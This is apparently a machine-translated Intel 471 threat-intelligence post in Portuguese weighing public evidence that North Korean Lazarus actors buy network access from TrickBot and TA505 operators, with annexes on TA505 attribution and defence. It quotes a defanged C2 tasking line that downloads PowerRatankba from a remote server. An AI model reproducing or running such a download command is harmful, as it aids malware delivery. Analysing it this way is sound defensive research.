Parceiros no crime: norte-coreanos e cibercriminosos de elite russo

Views: 790

Este post no blog analisa a credibilidade das reivindicações em relatórios públicos de links norte-coreanos (conhecidos como DPRK para o resto deste post) aos cibercriminosos de língua russa. O post é baseado tanto quanto possível em fontes públicas e abertas de partes confiáveis que podem ser referenciadas em vez de introduzir novas ou confidenciais fontes de informação. Examinamos TrickBot, TA505 e Dridex, acredita-se que se originam da Europa Oriental, e tentamos entender possíveis ligações entre esses e os atores de ameaça da RPDC.

Para efeitos deste post no blog, estamos fazendo as seguintes suposições geralmente aceitas:

• O Grupo Lazarus/Lazarus está ligado aos atores de ameaça da RPDC.
• TrickBot, TA505 e Dridex estão ligados a cibercriminosos de língua russa.

Está fora do escopo deste post de blog para explicar ou justificar essa atribuição.

Principais descobertas

• Os atores de ameaças da RPDC provavelmente estão ativos no subterrâneo cibernético e mantêm relações confiáveis com cibercriminosos de alto nível russo.
• Acredita-se que o malware só foi usado e provavelmente escrito por atores de ameaças da RPDC foi muito provavelmente entregue através de acessos de rede mantidos por cibercriminosos de língua russa (TrickBot, TA505).

Buscando ajuda

Em 28 de agosto de 2020, postei um tweet pedindo a vários pesquisadores de segurança dados/informações originais de origem que ligavam Lazarus a Dridex ou TrickBot. Meu tweet indicou que eu estava cético sobre supostas ligações entre atores de ameaça da RPDC e os atores por trás de TrickBot, TA505 e Dridex.

TrickBot, TA505 e o cibercriminoso subterrâneo

O “cibercriminoso subterrâneo”, como gostamos de chamá-lo na Intel 471, é um ecossistema organizado de produtos, serviços e bens composto por fornecedores e consumidores da vida real que podem ser mapeados, rastreados, compreendidos e expostos. A participação e a entrada no subsolo nas camadas inferiores é fácil. Tornar-se confiável, verificado e alcançar uma boa reputação subterrânea leva anos de trabalho. Avaliamos os operadores e clientes da TrickBot e os atores que compõem o TA505 como cibercriminosos de primeira linha.

TrickBot é uma oferta privada de malware como serviço (MaaS), dirigida por cibercriminosos de língua russa, que não é anunciada abertamente em qualquer fórum ou mercado cibernético aberto ou somente para convidados. É determinado pela Intel 471 que apenas cibercriminosos de alto nível com reputação comprovada podem acessar o serviço. A reputação é adquirida por estar envolvida na compra e venda de produtos, serviços e bens no subsolo cibercriminoso. Mesmo identificar com quem conversar sobre o acesso ao TrickBot exigiria uma quantidade significativa de atividade e reputação no subsolo. Portanto, a capacidade dos atores de ameaças da DPRK de se comunicarem com operadores ou clientes da TrickBot significaria que eles são considerados cibercriminosos de primeira linha por si só.

A Intel 471 também acredita que os atores do TA505 estão fortemente envolvidos no subterrâneo do cibercriminoso com base na quantidade de ferramentas que compraram de lá. Várias organizações vinculam incorretamente a atividade de ameaça ao TA505, portanto, mais informações sobre o que consideramos ser atividade de ameaça TA505 estão disponíveis no anexo 1: Definindo o TA505 na parte inferior deste post.

Atribuindo atores de ameaça que usam um MaaS compartilhado – TrickBot

Ao examinar famílias de malware que são compartilhadas ofertas maaS como TrickBot, é preciso entender como identificar diferentes usuários do serviço criminoso compartilhado. Com o TrickBot, o malware tem um parâmetro codificado em cada amostra chamado gtag. Acredita-se que seja um identificador de campanha, útil para rastrear os diferentes mecanismos de disseminação dos operadores TrickBot.

A Unidade 42 de Palo Alto (BradDuncan) escreveuum blog que foi publicado em 28 de maio de 2020, e incluiu o seguinte:

Todo binário TrickBot tem um identificador chamado gtag. Isso é encontrado em dados de configuração extraídos de um binário TrickBot. Gtags também podem ser encontrados no tráfego HTTP durante uma infecção pelo TrickBot. Eles indicam a campanha específica ou a fonte de infecção usada para um binário TrickBot.

O gtag é uma corda alfabética curta seguida por um número representando uma serialização única. Exemplos a seguir:

• mor-series gtag: TrickBot causado por uma infecção emotet, por exemplo: TrickBot gtag mor84 causado pela Emotet em 27 de janeiro de 2020.
• gtag ono-series: várias infecções do TrickBot iniciadas através de documentos maliciosos do Microsoft Office, como documentos do Word ou planilhas do Excel, distribuídas através de e-mails em inglês.
• gtag série vermelha: TrickBot distribuído como um arquivo DLL em vez de um EXE, por exemplo: TrickBot gtag red5 documentado em 17 de março de 2020.

Vinculando atores de ameaças da RPDC ao TrickBot – análise da LEXFO

Em 19 de fevereiro de 2020, foi publicado um relatório da consultoria francesa de segurança da informação LEXFO intitulado “The Lazarus Constellation – A study on North Korean malware” foi publicado. Uma seção do relatório é intitulada Clarifying links com TA505 (Emotet, TrickBot & Dridex). Embora incluindo alguns links pouco claros e inexplicáveis entre TA505 e Emotet (nunca vimos o TA505 usar Emotet), bem como TrickBot e Dridex (ver anexo 1: Definindo TA505), o relatório afirma:

• Os atores de ameaças da RPDC usaram um pedaço de ransomware chamado Hermes, que foi vendido no subsolo “por apenas US$ 300 em 2017/2018” e o ransomware Ryuk compartilha a maior parte de seu código com a Hermes.
• “Os pesquisadores relataram que viram infecções anteriores de Lazarus conviverem com Emotet e TrickBot, que também podem ser observadas durante uma missão forense.”

A Intel 471 foi capaz de verificar que Hermes foi oferecido para venda (postado em russo e inglês) pelo ator CryptoTech em um fórum de cibercriminosos em língua russa em meados de 2017.

Ligando atores de ameaças da RPDC ao TrickBot – PowerBrace

Em 11 de julho de 2019, a NTT Security publicou um post no blog intitulado “Atividade trickbot direcionada derruba backdoor ‘PowerBrace'”. Embora o post no blog afeta incorretamente a atividade observada de maio de 2019 esteja possivelmente ligada ao TA505 (ver Anexo 1: Definindo TA505), ele cobre um incidente onde o TrickBot foi usado para entregar o backdoor do PowerBrace, que o BAE atribui aos atores de ameaça da RPDC.

O post no blog da NTT Security, infelizmente, também não esclarece o evento precursor para a infecção específica do TrickBot que levou o PowerBrace a ser lançado no sistema ou em que versão e gtag das infecções do TrickBot estavam deixando o PowerBrace.

Ligando atores de ameaça da RPDC ao TrickBot – Âncora e PowerRatankba

Em 10 de dezembro de 2019, pesquisadores do SentinelOne publicaram um post no blog e um relatório intitulado “Anchor Project | The Deadly Planeswalker: How The TrickBot Group United High-Tech Crimeware & APT.” O relatório alegou que os atores da TrickBot “refatoriram e reutilizaram” o TrickBot em uma “estrutura de ataque aproveitando o projeto chamado ‘Anchor'” e que anchor estava sendo “alavancado para atacar ativamente empresas de varejo de médio porte entre outras entidades corporativas usando sistemas de ponto de venda (POS)”. Sua pesquisa também revelou uma “tarefa de comando e controle para uma máquina comprometida para baixar uma ferramenta específica ligada ao Lazarus PowerRatankba” do Anchor. A tarefa específica foi:

BaixarString (‘hxxps://ecombox[.] armazenar/tbl_add.php?action=cgetpsa’)

Um dia depois (11 de dezembro de 2019), a Cybereason publicou um post no blog intitulado “Drop Anchor: From a TrickBot infection to the discovery of the Anchor malware” que dizia (sem quaisquer links mencionados para atores de ameaças da RPDC ou ferramentas) que anchor estava focado em direcionar sistemas PoS. Eles ainda descreveram Anchor como sendo “usado de forma muito seletiva em alvos de alto perfil” e aparentando estar “fortemente conectado ao TrickBot“. O vetor de infecção descrito pela Cybereason “começa com um e-mail de phishing que contém um link malicioso para um arquivo hospedado no Google Docs chamado ‘Relatório Anual de Bônus.doc’. Quando o usuário clica no link, o conta-gotas TrickBot é baixado na máquina de destino. Isso difere dos ataques trickbot anteriores que vimos, onde o TrickBot geralmente é descartado através de um documento do Microsoft Office ou por outro malware como o Emotet.”

A NTT Security também publicou um post no blog intitulado “TrickBot variant ‘Anchor_DNS’ comunicando-se sobre DNS” em 6 de julho de 2020. Este post abrange (sem quaisquer links mencionados para atores de ameaças da RPDC ou ferramentas) NTT vendo “Anchor_DNS” implantado contra o setor financeiro e contra “servidores de alto impacto, como controladores AD [Active Directory]”. Eles explicam o vetor de infecção como sendo “os métodos típicos de distribuição do TrickBot, como spam de correio e conta-gotas de malware.” O NTT descreve a implantação de malware selecionado dependendo do destino, mas descreve sua visibilidade mostrando que ransomware e PoS são “prevalentes“. Eles também descrevem os gtags TrickBot relacionados a esta atividade como “tot548, ser501, etc.”

Dos três posts em Anchor, apenas um mencionou observar uma ferramenta que acredita-se estar ligada a atores de ameaça da RPDC. O SentinelOne relatou ter visto uma tarefa de comando e controle (via Anchor) para baixar o PowerRatankba para um sistema infectado. PowerRatankba também é mencionado em um post publicado em 15 de janeiro de 2019, do Flashpoint que cobre uma intrusão de dezembro de 2018 em uma “rede interbanc chilena” que se diz envolver o PowerRatankba.

PowerRatankba só foi relatado ter sido usado em um pequeno número de compromissos, principalmente contra instituições financeiras, e o SentinelOne afirma que foi empurrado via Anchor com uma infecção trickbot sendo um precursor do que o SentinelOne relatou. De acordo com um relatório de código aberto sobre o incidente contra Redbanc, como descrito no post do blogdo Flashpoint,um funcionário da Redbanc foi socialmente projetado para executar um arquivo chamado ApplicationPDF.exe. A análise do Flashpoint deste arquivo é que o ApplicationPDF.exe é um conta-gotas que “exibe um formulário falso de aplicativo de trabalho durante o download e execução do PowerRatankba” e que hxxps://ecombox[.] store/tbl_add.php?action=agetpsb é chamado. Este é o mesmo servidor e um pedido de get muito semelhante como descrito pelo SentinelOne em sua pesquisa no Anchor.

Com base na análise do Flashpoint, a QuoIntelligence publicou um post no blog em 21 de janeiro de 2019, afirmando acreditar que o alvo de vários funcionários do banco paquistanês por atores da RPDC havia ocorrido. No caso de descreverem, applicationPDF.exe (também conectado ao ecombox[.] loja e descrito como PowerRatankba) também foi usado e sua “análise revelou que a vítima era um funcionário de um provedor de serviços financeiros no Paquistão e conhecedor de sistemas financeiros e tecnologias, incluindo Ponto de Vendas (PDV) e Máquina de Caixa Automatizada (ATMs).”

Proofpoint, em seu post e relatório intitulado “North Korea Bitten by Bitcoin Bug: Campanhas financeiramente motivadas revelam nova dimensão do Lazarus Group” e publicadas em 19 de dezembro de 2017, descreve o PowerRatankba como uma “variante de malware baseada no PowerShell que se assemelha muito ao implante original de Ratankba” descreve o PowerRatankba como uma “variante de malware baseada no PowerShell que se assemelha muito ao implante original de Ratankba”. Proofpoint escreve que eles “acreditam que o PowerRatankba foi provavelmente desenvolvido como um substituto no arsenal estritamente motivado financeiramente do Grupo Lazarus para preencher o buraco deixado pela descoberta de Ratankba.” Proofpoint também se vincula a um post no blog da Trendmicro intitulado “Ratankba: Aprofundando-se em buracos de rega em larga escala” e publicado em 27 de fevereiro de 2017, que fala sobre Ratankba estar “ligado a ataques de malware contra bancos na Polônia, mas também em uma série de incidentes semelhantes envolvendo instituições financeiras em diferentes países”. Análise de atribuição de Trendmicro de Ratankba:

Os ataques foram realizados pelo grupo cibercriminoso Lazarus?

Embora haja ambivalência se eles fossem realmente seu trabalho manual, nossa análise indica que os códigos e técnicas de malware empregados se assemelhavam aos usados por Lázaro.

Atores de ameaça da DPRK provavelmente ligados a operadores ou usuários trickbot

Com base nos links acima examinados entre a ameaça DPRK e o TrickBot, avaliamos que é provável que haja uma ligação entre os operadores ou usuários de atores de ameaça TrickBot e DPRK. TrickBot certamente parece ser uma fonte de acessos comprometidos que os atores de ameaças da RPDC podem aproveitar. Os operadores ou usuários do TrickBot parecem ser bem versados em identificar organizações interessantes que eles comprometeram para atividade de intrusão de acompanhamento, seja através de ferramentas de intrusão âncora ou comum (Metasploit, Cobalt Strike, BloodHound, Empire, etc.), ou para passar ou vender para outros atores de ameaça, ou seja, atores de ameaça da RPDC.

O precursor de uma infecção pelo TrickBot e a versão e o gtag de uma amostra trickbot que leva à ferramenta DPRK precisa ser melhor compreendido para qualquer análise futura de links DPRK para TrickBot. Não há informações de origem originais suficientes disponíveis dentro de fontes abertas para entender se todas as infecções do TrickBot poderiam potencialmente levar a atores de ameaça da RPDC ou apenas um subconjunto de infecções do TrickBot poderia levar a uma intrusão da RPDC. Apenas um subconjunto de infecções do TrickBot que levam a invasões da RPDC pode significar que os usuários/clientes do TrickBot estão ligados a atores de ameaças da DPRK, em vez dos operadores do TrickBot MaaS.

Ligando atores de ameaça da RPDC ao TA505

Em 10 de abril de 2019, o pesquisador Norfolk escreveu um post no blog intitulado “OSINT Reporting Regarding DPRK and TA505 Sobreposição”. Este post no blog cita uma apresentação da BAE Systems 2019 da conferência anual de pesquisadores de segurança (SAS) da Kaspersky que menciona uma “possível sobreposição entre invasões ta505 e invasões da RPDC, sugerindo uma possível entrega entre os dois grupos”.

O post de Norfolk incluía um link para um artigo da Wired que foi postado em 9 de abril de 2019, e intitulado “Uma nova geração de hackers de caixa eletrônico entra através de uma rede de bancos”. No artigo da Wired estão citações do analista de inteligência de sistemas da BAE Saher Naumaan (um dos apresentadores da apresentação na SAS) no que diz respeito às ligações entre Lazarus e TA505:

Em seu trabalho de resposta a incidentes com bancos, os analistas da BAE Systems notaram repetidamente que as redes de vítimas que estavam estudando estavam infectadas com um malware apelidado de GraceWire e ferramentas de malware conhecidas do Lazarus. Os pesquisadores também encontraram possíveis ligações entre a GraceWire e uma conhecida gangue criminosa de hackers motivada financeiramente chamada TA505. Embora Naumaan diga que é muito cedo para tirar conclusões definitivas sobre essas sobreposições, é possível que Lázaro tenha contratado com a TA505 ou outros grupos para ter acesso a redes financeiras.

“Há uma espécie de teoria central que está sendo considerada que o TA505 pode ser o único a comprometer a rede e obter o acesso inicial e, em seguida, vender esse acesso a Lázaro”, diz Naumaan. “Isso seria interessante porque na maioria desses incidentes de fraude não conhecíamos o vetor de intrusão — essa era uma das maiores incógnitas.”

Saher Naumaan também esclareceu a ligação entre TA505 e Lázaro no Twitter:

Também só para esclarecer, na minha palestra eu disse que era apenas uma teoria e não podemos verificar isso, e há outras teorias também

A própria análise da Intel 471 é que graceWire também conhecido como FlawedGrace (como mencionado no referido artigo wired) foi observado sendo usado porTA505. Proofpoint também vinculou o uso do GraceWire ao TA505 em um post no blog no início de 2019. Intel 471 não está ciente de nenhum ator de ameaça que tenha usado GraceWire além de TA505.

Apesar da alegação da BAE de que a descoberta de sistemas do setor financeiro comprometidos tem ferramentas que se acredita serem usadas apenas pelo TA505, juntamente com ferramentas usadas apenas por atores de ameaças da DPRK, é difícil concluir independentemente que existe uma ligação sólida entre atores de ameaça TA505 e DPRK sem ver dados/informações originais de origem. Um exame mais aprofundado é necessário para entender quantas redes de vítimas os analistas da BAE viram as ferramentas TA505 e DPRK umas com as outras e no contexto em que foram vistos juntos.

A Agência de Segurança cibernética e infraestrutura dos EUA (CISA) lançou recentemente um alerta intitulado “FASTCash 2.0: North Korea’s BeagleBoyz Robbing Banks on 26 august 2020”. Este alerta menciona especificamente que os atores de ameaças da RPDC podem “estar trabalhando ou contratando grupos criminosos de hackers, como o TA505, para o desenvolvimento inicial do acesso”.

Embora não tenhamos sido capazes de ligar conclusivamente RPDC e TA505 através de fontes abertas, conversas que tivemos com outros membros da comunidade de segurança nos deixaram com a opinião de que TA505 historicamente trabalhou em algumas ocasiões com atores de ameaça da RPDC, embora isso não pareça ter ocorrido recentemente.

Nenhuma informação que sugira que os atores de ameaça da RPDC estão ligados ao Dridex

Veja o anexo 2: Não foi encontrada ligação entre os atores de ameaça da RPDC e os atores por trás do Dridex.

Observações finais

Nossa conclusão é que consideramos provável que atores de ameaças correndo ou tendo acesso a infecções trickbot estejam em contato com atores de ameaças da RPDC. Embora seja difícil avaliar, parece provável que os acessos de rede comprados por atores de ameaças da RPDC de atores ligados ao TrickBot eram de instituições financeiras. Também parece que os atores de ameaças da RPDC têm várias outras fontes de acesso à rede além de apenas infecções do TrickBot e que duas dessas fontes adicionais são acessos vendidos no subsolo de cibercriminosos e acessos obtidos através da engenharia social. O número crescente de acessos à rede vendidos por outros cibercriminosos no subsolo poderia permitir que os atores de ameaças da RPDC focassem maiores esforços no desenvolvimento de ferramentas e táticas, técnicas e procedimentos (TTPs) para manter a persistência e operar dentro de redes comprometidas, em vez de esforços iniciais de acesso.

Anexo 1: Definição de TA505

Definir o TA505 é uma tarefa um pouco difícil por causa de sua organização descentralizada. Inúmeras organizações (Intel 471 incluídas) têm sua própria visão sobre o que é e não é TA505, mas com o Proofpoint chegando primeiro com o nome, é justo que usemos sua descrição como base para este post. A primeira menção ta505 que pudemos encontrar do Proofpoint é seu post no blog de 27 de setembro de 2017, intitulado “Threat Actor Profile: TA505, From Dridex to GlobeImposter.”.

Os pesquisadores do Proofpoint rastreiam uma ampla gama de atores de ameaças envolvidos em crimes cibernéticos motivados financeiramente e ações patrocinadas pelo Estado. Um dos atores mais prolíficos que rastreamos – conhecido como TA505 – é responsável pelas maiores campanhas de spam maliciosas que já observamos, distribuindo instâncias do Trojan bancário Dridex, ransomware Locky, ransomware Jaff, The Trick banking Trojan [Trick = TrickBot], e vários outros em volumes muito altos.

Como o TA505 é uma parte tão significativa do cenário de ameaças de e-mail, este blog fornece uma retrospectiva sobre a mudança de malware, cargas e campanhas associadas a este ator. Examinamos o uso de malwares como Jaff, Bart e Rockloader que parecem ser exclusivos deste grupo, bem como malwares mais amplamente distribuídos como Dridex e Pony.

…

As últimas campanhas de TA505 com The Trick apareceram em meados de setembro de 2017 com cargas alternadas entre Locky e The Trick.

A partir disso, podemos verificar que o Proofpoint acredita que o TA505 usa uma série de ferramentas diferentes que outros cibercriminosos também usam, mas eles acreditam que eles são os usuários exclusivos de Jaff, Bart e Rocketloader. A partir dessa gravação, Proofpoint acredita que TA505 usa tanto Dridex quanto TrickBot, mas outros atores também os usam.

Erros comuns de atribuição em relação ao TA505 que vemos são:

• Alegando que o TA505 desenvolveu o Dridex. A TA505 foi cliente da Dridex de 2014 a 2017 e parou de usar a Dridex em 2018. As fontes para isso são a Agência Francesa de Cibersegurança ANSSI e o NCC Group. Evil Corp é o grupo por trás da Dridex, uma série de cujos membros foram indiciados publicamente no final de 2019 pelo Departamento de Justiça dos EUA.
• Equiparando todas as atividades emotet ou TrickBot a TA505. TA505 nunca usou Emotet e só usou TrickBot por um curto período de tempo no final de 2017.

Anexo 2: Nenhuma ligação encontrada entre atores de ameaça da RPDC e os atores por trás de Dridex

Em 15 de novembro de 2017, Jerome Kehrli postou um post no blog intitulado “Decifrando o assalto ao banco de Bangladesh” que incluía a menção de um “worm Dridex personalizado” com o nome de arquivo evtdiag.exe usado no hack do Bangladesh Bank. O post de Kehrli no blog é frequentemente citado como a fonte de ligação entre Lázaro e Dridex. Dois pesquisadores de segurança no Twitter apontaram que evtdiag.exe não era Dridex, mas uma ferramenta ligada ao Lazarus. Kehrli respondeu a isso com a confirmação de que a crença era que evtdiag.exe era Dridex na época, mas não foi confirmado. Como resultado, Kehrli disse que atualizaria o artigo para refletir essas informações.

Com base na resposta de Kehrli e nenhuma outra informação ou dados de origem primária, nenhuma outra ligação entre Dridex e Lázaro foi encontrada.

Anexo 3: Como proteger sua organização de atores de ameaças da RPDC que têm acesso através de uma infecção pelo TrickBot

A primeira ordem de negócios para qualquer organização é ter uma boa higiene de segurança, incluindo, mas não se limitando ao monitoramento contínuo de segurança, uma estratégia de detecção e resposta e recuperação. Não importa o mecanismo de disseminação do TrickBot, todas as amostras do TrickBot usam a mesma lista de servidores de comando e controle. Ao bloquear esses servidores de controle, o TrickBot não será capaz de ligar para casa para os servidores do criminoso. Uma vez que os criminosos por trás do TrickBot identificaram um acesso de interesse, o defensor da rede está correndo contra o relógio. Os próximos passos possíveis para os criminosos são ataques de ransomware ou fornecer/vender acesso a outros atores, ou seja, atores de ameaça da DPRK.

FONTE: INTEL 471